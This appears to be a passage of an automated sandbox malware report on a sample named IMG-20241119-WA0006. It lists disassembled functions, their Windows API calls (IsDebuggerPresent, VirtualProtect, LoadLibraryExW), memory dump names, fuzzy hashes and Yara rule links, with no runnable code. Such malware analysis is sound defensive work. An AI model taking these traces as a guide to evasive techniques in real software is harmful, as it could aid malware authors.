Opcode ID: e1609396d88a308aba07286a1a60ce74fd2c9524b697cad7c5c1e5627fffda92
Instruction ID: 6d496b2a66a20bb1b08332912dd492ff6395d1ef9e961984a6b9e3d098b46742
Opcode Fuzzy Hash: e1609396d88a308aba07286a1a60ce74fd2c9524b697cad7c5c1e5627fffda92
Instruction Fuzzy Hash: 2D01DD71904258BEDB68C798CC56FEDBBF89B15305F00455EF553D6181D974E7048B60

Function 00083A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00083A73

Part of subcall function 000A1405: __lock.LIBCMT ref: 000A140B

Part of subcall function 00083ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00083AF3
Part of subcall function 00083ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00083B08

Part of subcall function 00083D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00083AA3,?), ref: 00083D45
Part of subcall function 00083D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00083AA3,?), ref: 00083D57
Part of subcall function 00083D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00141148,00141130,?,?,?,?,00083AA3,?), ref: 00083DC8
Part of subcall function 00083D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00083AA3,?), ref: 00083E48

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00083AB3

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
String ID:
API String ID: 924797094-0
Opcode ID: f858b727f7fb120948c78fcabff1af3981925fcbe7d0306eb29e4876de119ece
Instruction ID: afcd3d73864a9c005f840211a35745317510ff62a83860f8a8e98b6a59af286f
Opcode Fuzzy Hash: f858b727f7fb120948c78fcabff1af3981925fcbe7d0306eb29e4876de119ece
Instruction Fuzzy Hash: 33119D75908341ABC700EFA9E84599EFBE8FF96710F00891EF594876B2DB7095C4CB92

Function 000AE9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 000AEA29
__close_nolock.LIBCMT ref: 000AEA42

Part of subcall function 000A7BDA: __getptd_noexit.LIBCMT ref: 000A7BDA

Part of subcall function 000A7C0E: __getptd_noexit.LIBCMT ref: 000A7C0E

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle__close_nolock
String ID:
API String ID: 1046115767-0
Opcode ID: bbef7f58fe990f28d3338c0e76570c23c80a43de59de7c61edd78a3e3ea752cf
Instruction ID: 7b291e2ffce530af1229953d410b2cec165f5030bd4ee9b7742a459dace4fcf9
Opcode Fuzzy Hash: bbef7f58fe990f28d3338c0e76570c23c80a43de59de7c61edd78a3e3ea752cf
Instruction Fuzzy Hash: 1811A9725056909AD722BFE4D84139D7AA16F53331F1A4344E4345F1F3CBB49C4186A2

Function 0009F4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 000A395C: __FF_MSGBANNER.LIBCMT ref: 000A3973
Part of subcall function 000A395C: __NMSG_WRITE.LIBCMT ref: 000A397A
Part of subcall function 000A395C: RtlAllocateHeap.NTDLL(00F10000,00000000,00000001,00000001,00000000,?,?,0009F507,?,0000000E), ref: 000A399F

std::exception::exception.LIBCMT ref: 0009F51E
__CxxThrowException@8.LIBCMT ref: 0009F533

Part of subcall function 000A6805: RaiseException.KERNEL32(?,?,0000000E,00136A30,?,?,?,0009F538,0000000E,00136A30,?,00000001), ref: 000A6856

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 2b2258856f8489bbd65cda828ec6fa2548e201c107ff5f8dcdda13efb0adf166
Instruction ID: 9a9e2dbede099a573167f699652dfab7935202a5fb7172ab5298a13c5f9c6dc2
Opcode Fuzzy Hash: 2b2258856f8489bbd65cda828ec6fa2548e201c107ff5f8dcdda13efb0adf166
Instruction Fuzzy Hash: 59F0AF3110421EA7DB05BFDCE9019EE77ECAF01354F648125FA48E6182DFF19644A6A6

Function 000A3839 Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 000A3868
__lock_file.LIBCMT ref: 000A3889

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: 1c2d271ce49f31b9c5462fb16dd3699220f350299675819b0d9b1c5ff2e6c6ad
Instruction ID: 341210e5d354406555e28800508ebb8ee36b3f4c99e51326ffafaef641e4fa43
Opcode Fuzzy Hash: 1c2d271ce49f31b9c5462fb16dd3699220f350299675819b0d9b1c5ff2e6c6ad
Instruction Fuzzy Hash: 36014471900309FBCF22AFE59C015DF7BB1AF92360F158219F82456162DB768B61DF91

Function 000A35E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000A7C0E: __getptd_noexit.LIBCMT ref: 000A7C0E

__lock_file.LIBCMT ref: 000A3629

Part of subcall function 000A4E1C: __lock.LIBCMT ref: 000A4E3F

__fclose_nolock.LIBCMT ref: 000A3634

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 42fa88f88efc46588de515c63279d6df9e083c3d4586dc689108a91ba71c67ad
Instruction ID: b72dfd8c347d944229b264819b40c291079215760c8972ba787484c7c53810dc
Opcode Fuzzy Hash: 42fa88f88efc46588de515c63279d6df9e083c3d4586dc689108a91ba71c67ad
Instruction Fuzzy Hash: EEF09031901604AAD721AFE588027AEBAE06F53330F29C208F424AB2C2CB788A419E55

Function 00F5A4B8 Relevance: 1.7, APIs: 1, Instructions: 165COMMON

Download Yara Rule

APIs

Part of subcall function 00F59D28: GetFileAttributesW.KERNELBASE(?), ref: 00F59D33

CreateDirectoryW.KERNELBASE(?,00000000), ref: 00F5A60B

Memory Dump Source

Source File: 00000000.00000002.1680250145.0000000000F59000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F59000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f59000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: AttributesCreateDirectoryFile
String ID:
API String ID: 3401506121-0
Opcode ID: c1a9c5257e32a473c9124cca3cb167235f92464161f78d0dd376a757c3ae5abc
Instruction ID: 9de2d587c15b717649011f90ae815369e93e53e0fdc74230cf5c0e9e3a239818
Opcode Fuzzy Hash: c1a9c5257e32a473c9124cca3cb167235f92464161f78d0dd376a757c3ae5abc
Instruction Fuzzy Hash: 0E51643191120897DF14EFB0C844BEF7339EF58301F108568AA09F7290EB799B49CBA6

Function 000A2957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

__flush.LIBCMT ref: 000A2A0B

Part of subcall function 000A7C0E: __getptd_noexit.LIBCMT ref: 000A7C0E

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: __flush__getptd_noexit
String ID:
API String ID: 4101623367-0
Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
Instruction ID: aecdb666244182427ced0dfcc08f8af6708c3108154cb1694f1c4d0832a8a0a3
Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
Instruction Fuzzy Hash: B1418D31600706AFDB688FEDC8805AF7BE6AF56760F24863DE855C7241EA709D818B41

Function 0009ED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 0009EDC7

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: bdac7f118d84000d95d2cb5a3bcd6cb9c53d23eaae8f617ee061ec510c02f5a9
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 7C31E370A01145DBCB68DF18C480A6DFBF6FF49340B6486A5E40ACB266DB31EDC1EB80

Function 000F9A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 000F9A80

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 5440248ab33cfbbeb9fa1bb3ecfd86ceb9adae57319ac47acb8d17a183afebd7
Instruction ID: a13341376c22f00b64a4d43fda54710f25d1a35191e16e1562c3e880bd8076c3
Opcode Fuzzy Hash: 5440248ab33cfbbeb9fa1bb3ecfd86ceb9adae57319ac47acb8d17a183afebd7
Instruction Fuzzy Hash: 30416F70608651CFDB64DF14C484B2ABBE0BF45304F1989ACE99A4B762C372F885EF52

Function 000AED06 Relevance: 1.6, APIs: 1, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: __getptd_noexit
String ID:
API String ID: 3074181302-0
Opcode ID: 6b1c31d25ac2ec192e39be2fc31cf7e40bcd1d462dfd0b0d3a00f6228879e595
Instruction ID: 279fad23fa30a305f32b22e7976b6798ba7809dd2df7c50a6bf0a72e5066fb56
Opcode Fuzzy Hash: 6b1c31d25ac2ec192e39be2fc31cf7e40bcd1d462dfd0b0d3a00f6228879e595
Instruction Fuzzy Hash: 0D218E728546809BD722BFE8DC4579D3AA16F43736F264650E4384F1E3DBB48C408BA1

Function 000841A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00084214: FreeLibrary.KERNEL32(00000000,?), ref: 00084247

LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,000839FE,?,00000001), ref: 000841DB

Part of subcall function 00084291: FreeLibrary.KERNEL32(00000000), ref: 000842C4

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Library$Free$Load
String ID:
API String ID: 2391024519-0
Opcode ID: 647716d1d92dc94049b58e9e8633b00d1132e69aefad31842fd5055c402b8950
Instruction ID: bfd29e42491787cec0af58bd4dd71f9f92c619a8bc75460b79118f4349021a3c
Opcode Fuzzy Hash: 647716d1d92dc94049b58e9e8633b00d1132e69aefad31842fd5055c402b8950
Instruction Fuzzy Hash: 8111A331604207ABDB20FB74DC06FEE77E9BF40700F508429F9D6A61C2EB749A059B60

Function 000F9B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 000F9B51

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 029bbf0679542aa52f1cb99a7ec7dfd8a09ee82d4de886d12079011fe78fad93
Instruction ID: 05d8788a198bb3d1dfdb298ddc419e24ec6fd698b4aa39d672c38f1e71ac84c0
Opcode Fuzzy Hash: 029bbf0679542aa52f1cb99a7ec7dfd8a09ee82d4de886d12079011fe78fad93
Instruction Fuzzy Hash: 96210770508701CFDB64DF64C444B6ABBE1BF85304F25496CF69A47662C732E845EF92

Function 000AAF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 000AAFC0

Part of subcall function 000A7BDA: __getptd_noexit.LIBCMT ref: 000A7BDA

Part of subcall function 000A7C0E: __getptd_noexit.LIBCMT ref: 000A7C0E

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle
String ID:
API String ID: 1144279405-0
Opcode ID: ad111cd0e04cd976c0c4c3d86e855d1cad98ae5e45573e6167978809f22ab5ed
Instruction ID: f099114f0e6d3eb11d1a6fd57b24ec32d64fd82a46d3744c831cf6354c543a3e
Opcode Fuzzy Hash: ad111cd0e04cd976c0c4c3d86e855d1cad98ae5e45573e6167978809f22ab5ed
Instruction Fuzzy Hash: 32119D729056009FD7226FE4DC06B9E3AA0AF43331F1A8250E5381F1E3CBB589408BA1

Function 000839DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: daa29a418462963be006df0018d3ea545f1b1bfa4cb5ec5a6529a35093eb270d
Instruction ID: 2b028c14c250f5b688a075ce86c31f1d89e9aa9c5059bd3cf63bee65855742c3
Opcode Fuzzy Hash: daa29a418462963be006df0018d3ea545f1b1bfa4cb5ec5a6529a35093eb270d
Instruction Fuzzy Hash: 6401123150410EAECF45EFA4C8918FEBBB4AB11344F508129A55596196EA309A49DB60

Function 000A2AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 000A2AED

Part of subcall function 000A7C0E: __getptd_noexit.LIBCMT ref: 000A7C0E

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 2ba781a5b1d51c051c587b80507ae7956e89657b5c373f198857f16a93ed91e6
Instruction ID: d6a7f8d4d82b242f26bbcc264b342bd77b9ebcf14c0e541e90ded2ddf8d0aa2f
Opcode Fuzzy Hash: 2ba781a5b1d51c051c587b80507ae7956e89657b5c373f198857f16a93ed91e6
Instruction Fuzzy Hash: 88F06231500215EBDF21AFE88C067DF36A5BF52320F1A8525B8149A192D7798A52DB52

Function 00084252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,?,?,000839FE,?,00000001), ref: 00084286

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: bf346150f5a58f2140ea71e4858d9c24f7fbfac6021c7b0668badc7af7a8f7fc
Instruction ID: 8b3507c59122a7b62dfbd002b52df8db5c971ac9d5f07ffd7171eb803ca51651
Opcode Fuzzy Hash: bf346150f5a58f2140ea71e4858d9c24f7fbfac6021c7b0668badc7af7a8f7fc
Instruction Fuzzy Hash: DDF03971509702CFCB74AFA4E890816BBE4BF143253658A3EF1D682610C7729980DF50

Function 000840A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 000840C6

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: cf40b43872b3a1d70086f219001ce15d807e37e29b36301ae728fce07567acb3
Instruction ID: 22ecd2beb470eac0e824047657304cffdf6895b1a2ce67de1408b2c998aed506
Opcode Fuzzy Hash: cf40b43872b3a1d70086f219001ce15d807e37e29b36301ae728fce07567acb3
Instruction Fuzzy Hash: CDE0C2366002245BC711A698DC46FFA77ADEF886A0F0A00B5F949E7245DEB4E9C18A90

Function 000CBCF4 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 000CBD16

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
Instruction ID: 6ab5d050139ef18a828f4aa2959619ea38140741c8dbbdac14ad5918baf90a9d
Opcode Fuzzy Hash: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
Instruction Fuzzy Hash: 06E092B0104B009BD7748B24D801BE373E0EB06305F00095DF29B83242FB627C418659

Function 00F59D28 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 00F59D33

Memory Dump Source

Source File: 00000000.00000002.1680250145.0000000000F59000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F59000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f59000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction ID: 01cd66a8d33f2173adec636e3724618aa68dd0f199fea59cdef1d0e8cea1d9dc
Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction Fuzzy Hash: C7E08C31909208EBCB58CAA8C944BA973B8EB04322F104664EE9AC7290D5B09E08FB51

Function 00F59CF8 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 00F59D03

Memory Dump Source

Source File: 00000000.00000002.1680250145.0000000000F59000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F59000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f59000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction ID: 560590b72f638fbc22aa75f31d0cea48901734202dfa2d1b7543bff2d3d04078
Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
